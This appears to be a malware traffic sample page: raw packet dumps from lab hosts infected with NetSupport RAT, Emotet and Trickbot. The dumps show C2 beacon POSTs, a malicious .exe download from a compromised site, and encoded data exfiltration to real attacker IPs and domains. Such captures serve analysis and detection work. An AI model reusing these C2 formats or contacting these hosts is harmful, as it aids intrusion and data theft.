49fb828cf9261063c0f4a312e5a0f154b96c3618ae60647f5b839b9af7d145b091948913c2a78429c94b4fcc3552181a223acc4137359e90b085d24603927e5aa8eecd46f3b94cb4dc9c6e7611909154f0b4f181128f8b7df98a60246b3cb41c1897f160f686b213c401e7a4996c3c58be60646f59f0ea7a76000d11659485f2e6a78658583dd99a14e07b6981887921773590999b7a2d1157a49d2d09d98a80301b49e048fd61373590919485d2e6e78499627cd

2019-08-26 15:03:39.075745 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 19120, win 256, length 0
E..(..@…[.
..e…..>.Pn.?x..].P………….
2019-08-26 15:03:39.168023 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 19120:20580, ack 14190, win 451, length 1460: HTTP
E…….1.ZQ….
..e.P.>..].n.?xP…….1000
d8a60655f3cb4fc982227159c509085d2a6a784994c199aaa40699e38b4dcdc613735b0b5d7b5f2e6a784996cbdd98a60457b7ff4fcbc41376590229861d2e665e26e69c98e9d367399abf34cbc6136319091b5a1d3d2a784ddaa6bbeca40647b3d80dcbc3411a3e616d4a5d2c6a73510a89dd96806925ac8223aeb7661235606d315d2e6a680996c1cfd8b54655f78728adb211734b490a085d2b38112efeb7df98a4065ceb5707cbc3561e297d60485d6e79384996c1dd91be9a1ff3cd0eb9a372073c0919084e6e6a7a4b96c3dd98a2423487aa4fcbc613631909100a34492f162dffa2b39aa60455fad3d181c615302b6c783c382e6a385ad6c3de8e121615f3cf09aab272715909fd581d2e61391ae2a2afecef683196b34fcbc613631909100a34492f162dffa2b39aa60455f3cb4d5bd253734d064901335a0f0a2ff7a0b8ddc872278a63598bc6117359a50d085d20652c00f8b7b8eac06736968e23bfb46a6f590919485d2e6a784d96c3ddd8b54655f3cb4dcbc4103a104d1b485d3f2a785996c3dd9aa0500192a921aec413ef4949195c5d2e6a7a4edf8cbbfed56321f1cb3dda86136b5909194a5767070825d1a6a9ecc37457f3c94dcbc60f6619090d470d67040c2ce4a5bcfbc3523491a728ffd353735b091970486e6a7646c28ab3ecc3743392a8289fa7711f3ccd5c4c5d2e6a784996c1dd98a69a45b3cb4dcbc61371534c773c2f5729173cf8b7df98a60655f3cf4dcbc611741c676d3a344b197a4994c3dd98a68e40b3cb43cc925e162d61762c552e6a784996c3dd98a40655f3cb5c8bc6137359091b4c1e410e1d4b96c3ccd8a60255f3cb4fcf827207380b194a5d286a73510a89dd94806925ac8e3cbea77f1a2d7019485d3e2a784b8447c8d8a6021996ad39c9c601f74c49194d0f470d103d94c3df98ad1ec9b9cb43eda9632c10677c39284f06113defc3dd98b64655f1d9c9de861377156c7f3c5f2e78fc5cd6c3d8cacf613d87c94dc9c6186bc54319
2019-08-26 15:03:39.168037 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 20580:22040, ack 14190, win 451, length 1460: HTTP
E…….1.ZP….
..e.P.>..c.n.?xP…;…477b411a270ee4a6bcecc374019baa23cbc6136319091b5ad93b2a784ddaa6bbeca4064777de0dcbc3411a3e616d4a5d2c6a73510a89dd8e806925ac8c3faea767162b5d71293361183d38e3a2b198a60645b3cb4fd9420633590d552d3b5a68785b12d69d98a3543c94a339c9c61173521185025d224c1739c98fb8ebd5523d92a54dcbc60333590b0bcc486e6a7c05f3a5a99aa614d1e68b4dce947a14317d1b485f2e6160d5dcc3cebec9760abfae3eb8927b1237466b0d2c5b0b144996c3cdd8a6044777de0dcbc25f163f7d1b484faa7f38499391b4ffce7257f3c94da3d15373590919485d2e6a784996c3dd14b94655f3cb4dcbae0433590919485d507238499ec3dd98a60655f303108bc6c32e190935281d2e4e18099687bdd8a64e35b3cb01ab86133339491920016e6afc15d6c365c4e60655f3e94d4dde53731d09edb7f1362a780b96372248be4655b1cbb9343f0b33594a19bca219733849d4c32967c01f15f3894d3f399c6a19095a48a9d1a961099680dd6c59fa4cb3cb0ecb32ec544349190b5dda952853d6c39e9852f929e98b4d88c6e78ce11359481e2e9e87ba8c83dddba6f2aaddd00dcb851387a67d02085d6d6a8cb627d89d98e406a10c20568bc65173adf63c541d2e2878bd69a8c1d8a645550734e4d786133059fde692416e6a3b49623cd085e60616f33fb28adb53731309ecb729332a780396352207bb4655b9cbba34140e33594319b0a203743849dcc32467f81815f3814d31399c6d19095348a6d1a266099689dd6459014ab3cb06cb3bec41464919025dd0952656d6c3909859f955f3cc1984a479163a7d3f48c5722a784fd5b1b8f9d26356f3cb4dcbc61b73580191571d2e6a784dc5a6b1fea40657f3ef4d039a53735d4f6b2d382d6a784996c3d598a70eddec8b4dcbc617203c657f4a5d2c6a51498e5f9798af423c80bb22b8a35c155a0919485d2e6278489e4bc2d8a60655f79828a7a011735b09274889722a7845dfadb4ecef682687aa23a8
2019-08-26 15:03:39.168042 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 22040:23224, ack 14190, win 451, length 1184: HTTP
E…….1.[c….
..e.P.>..iGn.?xP…X…

2019-08-26 15:03:39.168046 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 23224:24684, ack 14190, win 451, length 1460: HTTP
E…….1.ZN….
..e.P.>..m.n.?xP…’F..1000
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:18.005975 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8959766, win 3626, length 0
E..(..@…M.
..e…..>.Pn.Bf.A.EP..* y……..
2019-08-26 15:04:18.016420 IP 93.95.100.178.80 > 10.8.26.101.49204: Flags [F.], seq 13215, ack 336, win 473, length 0
E..(V|..5.H.]_d.
..e.P.4vO….:.P….n..
2019-08-26 15:04:18.016640 IP 10.8.26.101.49204 > 93.95.100.178.80: Flags [.], ack 13216, win 256, length 0
E..(..@….W
..e]_d..4.P..:.vO..P….G……..
2019-08-26 15:04:18.037966 IP 93.95.100.178.80 > 10.8.26.101.49205: Flags [F.], seq 6011, ack 365, win 473, length 0
E..(…5.B.]_d.
..e.P.58._.DT.P....z..
2019-08-26 15:04:18.038169 IP 10.8.26.101.49205 > 93.95.100.178.80: Flags [.], ack 6012, win 256, length 0
E..(..@....V
..e]_d..5.P.DT.8.`P….S……..
2019-08-26 15:04:18.051835 IP 93.95.100.178.80 > 10.8.26.101.49206: Flags [F.], seq 343, ack 408, win 473, length 0
E..(….5..S]_d.
..e.P.6..0…..P…V…
2019-08-26 15:04:18.052044 IP 10.8.26.101.49206 > 93.95.100.178.80: Flags [.], ack 344, win 255, length 0
E..(..@….U
..e]_d..6.P……0.P…Wb……..
2019-08-26 15:04:18.568546 IP 93.95.100.178.80 > 10.8.26.101.49207: Flags [F.], seq 16499, ack 424, win 473, length 0
E..(.B..5…]_d.
..e.P.7q5jo.n..P….L..
2019-08-26 15:04:18.568555 IP 93.95.100.178.80 > 10.8.26.101.49209: Flags [F.], seq 16623, ack 424, win 473, length 0
E..(z…5.$.]_d.
..e.P.9…FV[..P…….
2019-08-26 15:04:18.568559 IP 93.95.100.178.80 > 10.8.26.101.49208: Flags [F.], seq 15919, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.8(…I…P…u”..
2019-08-26 15:04:18.568563 IP 93.95.100.178.80 > 10.8.26.101.49210: Flags [F.], seq 16511, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.:S.c…4.P…]…
2019-08-26 15:04:18.568814 IP 10.8.26.101.49207 > 93.95.100.178.80: Flags [.], ack 16500, win 256, length 0
E..(..@….T
..e]_d..7.P.n..q5jpP….%……..
2019-08-26 15:04:18.568842 IP 10.8.26.101.49209 > 93.95.100.178.80: Flags [.], ack 16624, win 256, length 0
E..(..@….S
..e]_d..9.PV[…..GP… ………
2019-08-26 15:04:18.568850 IP 10.8.26.101.49208 > 93.95.100.178.80: Flags [.], ack 15920, win 256, length 0
E..(..@….R
..e]_d..8.PI…(…P…u………
2019-08-26 15:04:18.568856 IP 10.8.26.101.49210 > 93.95.100.178.80: Flags [.], ack 16512, win 256, length 0
E..(..@….Q
..e]_d..:.P..4.S.c.P…]………
2019-08-26 15:04:19.288443 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [P.], seq 3947:3986, ack 89439, win 821, length 39
E..Oa-..T.d…]#
..e…0.m… D.P..5z…….”…
;.s+2..,…..+,……j….0..Y
2019-08-26 15:04:19.288452 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a…T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.288696 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [.], ack 3987, win 253, length 0
E..(..@…=2
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.288940 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [F.], seq 89439, ack 3987, win 253, length 0
E..(..@…=1
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.289444 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a/..T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.302333 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [.], ack 89440, win 821, length 0
E..(.k..T…..]#
2019-08-26 15:04:19.967401 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [P.], seq 1:119, ack 1, win 258, length 118: HTTP: GET /location/loca.asp HTTP/1.1
E…..@….
..e>..#.@.P.@..~b#.P…….GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:04:20.126241 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [P.], seq 215:521, ack 655, win 254, length 306
E(.ZrF..n.o=.+.Z
..e…?…….!P…l…HTTP/1.1 200 OK
Server: NetSupport Gateway/1.6 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=u.2h.r.. .…W.h.E..=I….=n~…….7s.4…}.X…),.,.Dq.,…..()4.]..%y-A9H=n .:!…b<D…c…)=@UX.u….8+.t_A…R..b..’h[.T…jI

2019-08-26 15:04:20.134779 IP 62.172.138.35.80 > 10.8.26.101.49216: Flags [P.], seq 1:276, ack 119, win 258, length 275: HTTP: HTTP/1.1 200 OK
E..;9…q.”S>..#
..e.P.@~b#..@..P….?..HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Set-Cookie: ASPSESSIONIDSQTTAQAS=JMCCAGKBFCGMCLKBAJJGPDLL; path=/
X-Powered-By: ASP.NET
Date: Mon, 26 Aug 2019 19:04:18 GMT
Content-Length: 1

,
2019-08-26 15:04:20.135084 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [.], ack 276, win 257, length 0
E..(..@….~
..e>..#.@.P.@..~b$.P…[d……..
2019-08-26 15:04:20.327276 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 655:927, ack 521, win 258, length 272
E..8..@…r.
..e.+.Z.?…..!…(P…….POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 179.43.146.90
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=l3.<(T{.E…..V….k.9|||$(m..$Cj_……..0Mt..s…M.6..

2019-08-26 15:04:20.570080 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [.], ack 927, win 253, length 0
E(.(rG..n.pn.+.Z
..e…?…(…1P…Td..
2019-08-26 15:04:20.627030 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:…y………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.675976 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:.
.{………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.727322 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 927:1217, ack 521, win 258, length 290
E..J..@…r.
..e.+.Z.?…..1…(P….b..POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Host: 179.43.146.90
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:26.662060 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8960053, win 3624, length 0
E..(.B@…Ln
..e…..>.Pn.G..A.dP..(……….
2019-08-26 15:04:30.427725 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [P.], seq 409336:409766, ack 8960053, win 3624, length 430: HTTP: POST /1x1.gif?ss&ss2img HTTP/1.1
E….C@…J.
..e…..>.Pn.G..A.dP..(….POST /1x1.gif?ss&ss2img HTTP/1.1
Accept: */*
Accept-Language: en-us
Age: a17316821ea1038c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 979879f9.user3.altcoinfan.com
Content-Length: 385714
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:03:01.423467 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 468
E….s@…..
..e.. ..7…..K@:..k..$b……#…[.!….l.X...#.Fdg3..GZ.3q'\].#K..d.u..h.,.4.V..GP.....2z2..T.b[>.8.=^."$.n>m....V.c......f..H..Z...0b....9.>.........(......rV=L~.....m-...0M|.D+.....M.@...-..OA.#..3V7....<.K...,s_..iwk...kyK..S..r=....6......Y..L......|.L.I.........q6...."{v.....)%.g,.@.....]*$.....V.../.ZUD..U.+...6.&+![..aM....d.b.4D.......(."K...?....G..z.).k.c"...!cX.$6I.... ..%…>Z$.r…..S.d.ck.[…..:D..5….jY=.rj.. p ..1…Q..H_……!…zt..……Q.. O..a.….
2019-08-26 15:03:01.423995 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 1010
E….t@…#.
..e…........@.<4........ZL...;..!..@.S..!...s....2(.Bk2.m..f}.....8A..8……~.WG..S….……….}.#.v7..z5′.]..xn.x……._?..1.)..t.k8S..Y..O0Q. W.k….h.P.c…o…?4. ….Ih….A..J.jc…..x..l.D[.]a...8.M..7/&d.V./.Y...9._l....R]F..6....H..\k&..+......:.3ul.n.B.#=.....[Mw."P...Z.E..p2X.1[Be.n..=-4(V..%..VsdL...1..?..2^3.....R.........A....h.@m....&1])_x.....Lx.[e...s[.....;.2B+.qL..V..W...@TM..P..h-..R.|........1..%...d.qOm..i.}..?'..w.n"{.j.}P........;)X4...t.B..3........:..dUhQ.....;.....^.#w.e.,.@b8.DZh.1.D....@...W$~....?.....,.H.l.......n..$.+..H.$..NC5?..N...i.V..rx......8..g.$.;.=g2.....(..+.\.G.dXb.dQ.QU.....o......0.i(<.n#3...ube..q*l.wx...N!:51...{..z[......{2 8R4G.c'5.....Y;.:.0.e.-.]..Je....95..L.F#).)..@g.3&a.sg-.........S0..<|n..=....."$"D..>bE.?S.>..Y....)q. .e.F.Y2^...4......Y^..71t......4.p..v....s .h...xK>./.......d...j.>.zv[..n...M4J,..zJA.L....E.....B*.
2019-08-26 15:03:01.472993 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
E..8.x@....M
..e.. ..7...$..@:..k..$b.S.c...$....lhZW_..
2019-08-26 15:03:01.473493 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
E..8.y@...'i
..e.....…$. @.<4……#8o.$.1Y..D….W76
2019-08-26 15:03:01.504670 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
E..8.{@…’g
..e….....$t.@.<4..........I..". wI.....:
2019-08-26 15:03:01.528689 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 254
E....|@....g
..e.. ..7......@:..k..$b....Jb.....r.u.7..........?2..;h.E...N}...h>W.r....r_]...'....|..YTb..7i..:i..3..Y.U......'!.jd.6.~..5...i.],+O....n9.I.G......B..<..ND./...<...1.+....R..Y...F.B.l .Xge....@x.L.a.,K.1a...,.m....L. ^7.Y...6UR.E....R..e...>X5w.....D..=f....Ku...y*
2019-08-26 15:03:01.573710 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
E..8.}@....H
..e.. ..7...$.r@:..k..$b ...I..L@...;.fV..z
2019-08-26 15:03:01.576544 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 337
E..m.~@.....
..e.. ..7...YGh@:..k..$b foU?.....]...C.T.+...K.....s"......,....=(K.[.w...+.E....~|.T....'.cgK,.!....V.:._q.g.~..R.i.....H..a...u."#xJ/_.@.M.b...[.."s..Q.*])...C.<........P.!2...nA..5h....M&.j..!.H..Z.K..F.w..b.....)...Y.......e6t=.\......……..”…….f….>……:…=X._.. k..P…,5…e.A%t?o.?….C.=P7P.p.&.@.M ……..6’…….(.R5..s.e0..h.
2019-08-26 15:03:01.625002 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
E..8..@….E
..e.. ..7…$R.@:..k..$b.8 ..@…0..@.um…
2019-08-26 15:03:01.802524 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 247
E…..@….f
..e.. ..7….1X@:..k..$b.,|..|..;….id{.,.4.3……..=L_g…Q..Q.V.z{…1}..2.L.4…….!…0^+.P…+……G[g..m..5<.(7..[….v.w…j.<&z..rl.s[x…T..aJ&3jm:^….=.n..a.?.U.m&..I..SI.V…}.h.[…h..0…|.p…K#}V~c..k,..o.s.…N…@.w….W…..4~U.! ..CF..
2019-08-26 15:03:01.849036 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
E..8..@….@
..e.. ..7…$..@:..k..$b..|…+:.ZQ…..o.
2019-08-26 15:03:03.418784 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$_D@M…..K?…6L…..K……0b
2019-08-26 15:03:03.421675 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$.@@M…..K?.?q8#.8a.Uu?…{H O
2019-08-26 15:03:03.421733 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$?A@M…..K?..?w....}...N=..5.
2019-08-26 15:03:03.421795 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@.....
..e.. ......$.^@M.....K?.|.2.\9..g.9..]...7
2019-08-26 15:03:03.422363 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@.....
..e.. ......$..@M.....K?...J...T.J.pU.]....
2019-08-26 15:03:03.422395 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@.....
..e.. ......$ab@M.....K?.j.U..aAm..*.5%._Z.
2019-08-26 15:03:03.424121 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@.....
..e.. ......$p.@M.....K?..X+O.Ts.L..9:..M..
2019-08-26 15:03:03.424206 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8. @.....
..e.. ......$..@M.....K?.}..j...!.@.z.Du..9
2019-08-26 15:03:03.424444 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8.!@.....
..e.. ......$..@M.....K?.......B#...._MC}.h
2019-08-26 15:03:03.435279 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8.H@.....
..e.. ......$4O@M.....K?....P0.&..%.M..9*Y.
2019-08-26 15:03:03.435326 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8.I@.....
..e.. ......$..@M.....K?...,.OJ.......9uP4.
2019-08-26 15:03:03.435397 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8.J@.....
..e.. ......$I.@M.....K?..*.v.#^.R...[~.RR.
2019-08-26 15:03:03.435469 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8.K@.....
..e.. ......$a.@M.....K?....J.G.... ..c...k
2019-08-26 15:03:03.435540 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8.L@.....
..e.. ......$;@@M.....K?..."h.A...1....&...
2019-08-26 15:03:03.448683 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 41
E..E.T@.....
..e.. ......1..@M.....K?.).R.8:.'.k....k.-..6....g=.G_..
2019-08-26 15:03:03.448737 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8.W@.....
..e.. ......$|.@M.....K?....F. .h."........
2019-08-26 15:03:03.541893 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 296
E..D..@.....
..e.. ..7...0Q.@:..k..$b..>^n;".. s..Hf:T>.....W....."... ..a.#8.a..X'B..-....a.=.6..m".7.2..^ /..aA.!N... 4F..M...SJ<.F….+h…IRy5..J.B….!!ME….]Z.
..x..C.a..”Q.1..V….Bb:.;)w.(.n..[…r*}~..gM.^.…..7T.fm…s..”….$….6..L..i.d….~.u7D~.>.m0d.M..$.iX..y…….},.Z).a.w;j.. &.M.tb..9k.?.Kn+..IE1\’
2019-08-26 15:03:03.575606 IP 10.8.26.101.64439 > 172.217.9.142.443: UDP, length 1350
E..b..@…..
..e.. ……N…Q046P….2..x…. ……………CHLO….PAD…..SNI…..VER…..CCS…..UAID(…TCID,…PDMD0…SMHL4…ICSL8…NONPX…MIDS…SCLS...CSCT…COPTd…IRTTh…CFCWl…SFCWp…———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————www.google-analytics.comQ046…....~.......Chrome/76.0.3809.132 Windows NT 6.1; Win64; x64....X509........l..Y]..@T.]...W.....E.+...Zk^.o"d.......NSTP.w........…………………………………………………………………………………………………………………………………………………………………………………………………….

Emotet Banking Trojan and Trickbot Malware Traffic Sample infection w/Spambot Noise PCAP file Download

2019-09-18 13:32:22.678529 IP 10.9.18.101.49160 > 124.158.6.218.80: Flags [P.], seq 4191540612:4191540891, ack 2860101733, win 64240, length 279: HTTP: GET /wp-admin/n2keep7/ HTTP/1.1
E..?..@…Y1
.e|……P…..y.eP…Y…GET /wp-admin/n2keep7/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: thinhvuongmedia.com
DNT: 1
Connection: Keep-Alive

2019-09-18 13:32:22.942838 IP 124.158.6.218.80 > 10.9.18.101.49160: Flags [P.], seq 1:1277, ack 279, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$T…..A.|…
.e.P…y.e….P…….HTTP/1.1 200 OK
Date: Wed, 18 Sep 2019 17:26:02 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.33
X-Powered-By: PHP/5.6.33
Set-Cookie: 5d8268aa1193f=1568827562; expires=Wed, 18-Sep-2019 17:27:02 GMT; Max-Age=60; path=/
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 18 Sep 2019 17:26:02 GMT
Expires: Wed, 18 Sep 2019 17:26:02 GMT
Content-Disposition: attachment; filename="i5pv72yr.exe"
Content-Transfer-Encoding: binary
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

2019-09-18 13:33:30.627377 IP 10.9.18.101.49165 > 66.228.32.31.443: Flags [P.], seq 3657721627:3657721896, ack 2496123025, win 64240, length 269
E..5..@…vV
.eB. …….g…..P…”…GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Cache-Control: no-cache

2019-09-18 13:33:30.669920 IP 10.9.18.101.49164 > 189.129.4.186.80: Flags [P.], seq 899:1832, ack 2600252, win 63022, length 933: HTTP: POST /rtm/symbols/ HTTP/1.1
E…..@…..
.e…….Pr..G..^.P…….POST /rtm/symbols/ HTTP/1.1
Referer: http://189.129.4.186/rtm/symbols/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 189.129.4.186
Content-Length: 518
Connection: Keep-Alive
Cache-Control: no-cache

6ll8i995327yEb1qC=SbbKQbNltyr7OEcfzxrUQ304Q2%2FW6l5R9lo%2B5pVxib%2FIt4w3Sjeay5KbFubuIws4O0t7iA%2FTTdyiyRHbY7ySX3cga1z4cQuduITiXM9R5e7rTet9Uod5fFGxgh4JKFGS5n1sQ2TqoRhHBRx7cyBqBFIuag5dqUNeimMgsfRfYiwz39hBgErZ2D0Phl7Y6pFo%2BgASm3UxQKPwVMO8ux4AN2qvVtS2pEQ1HZZcDFci1m1YUNPlvgGhz6Gdpiiz2nZ%2Fr4fpHEK8spNliNSciLGdp7XKmD3rkLzPW5Y2Gm6J0PHywumZH0hJryQUQdwGmeWY8LiNcnQW4bRzxcA%2FSgIA0B8peygnfyCIwigVnD%2FwUBRRFjTCh5crDpm86cA9sZx1tnMgWbVF3cyJLDXvAkyYI%2B9IReYi9WIMTYjpUuPBxEm5zYaLYolpypw07kquVeRU5xXpSD3wp4D7w%2BmBFphGa1%2FKfn4%3D
2019-09-18 13:33:30.713609 IP 10.9.18.101.49166 > 104.236.185.25.8080: Flags [P.], seq 1031397366:1031397638, ack 3231780717, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
E..8..@….K
.eh…….=y…..mP…….GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:30.722484 IP 10.9.18.101.49167 > 104.236.185.25.8080: Flags [P.], seq 2799073531:2799073803, ack 2887398240, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
E..8..@….I
.eh………x…3`P…….GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:31.019952 IP 66.228.32.31.443 > 10.9.18.101.49165: Flags [P.], seq 1:211, ack 269, win 64240, length 210
E…]…..].B. .
.e……….h(P….P..HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding

e
173.66.146.112
0

2019-09-18 13:33:31.096777 IP 189.129.4.186.80 > 10.9.18.101.49164: Flags [P.], seq 2600252:2600556, ack 1832, win 64240, length 304: HTTP: HTTP/1.1 200 OK
E..X]……p….
.e.P….^.r.!.P…….HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 148
Connection: keep-alive

2019-09-18 13:33:35.224641 IP 10.9.18.101.49184 > 66.228.32.31.443: Flags [P.], seq 497095651:497096370, ack 1689891519, win 64240, length 719
E…..@…k.
.eB. .. ……d…P….x..POST /arizona/forced/sess/merge/ HTTP/1.1
Referer: http://66.228.32.31/arizona/forced/sess/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Content-Length: 274
Connection: Keep-Alive
Cache-Control: no-cache

Gr2qPfZCOq0zLdd=i7eSuPXcauG6h3x4nXsddr2HLhaseSX3P3dp7S4gBcKhcmoqkbf7HcBzb%2Brohq%2FeEkR%2BTnIjMI8V8T%2BAxqF%2FTEK2DhDrGASZbhUbLTPbf1upgbttXYNLrhthHlz4c5qcEHunBZWx0TLZ6Jd6XQvpghjIetcPXLPTuULc9957VIe9PeppR6pU9rDnk2VG%2Fw1PflceQ%2Fw59Gx%2BnGblT3orLZBUGOgmdwfAYGBjYe%2BuZLDzlb1T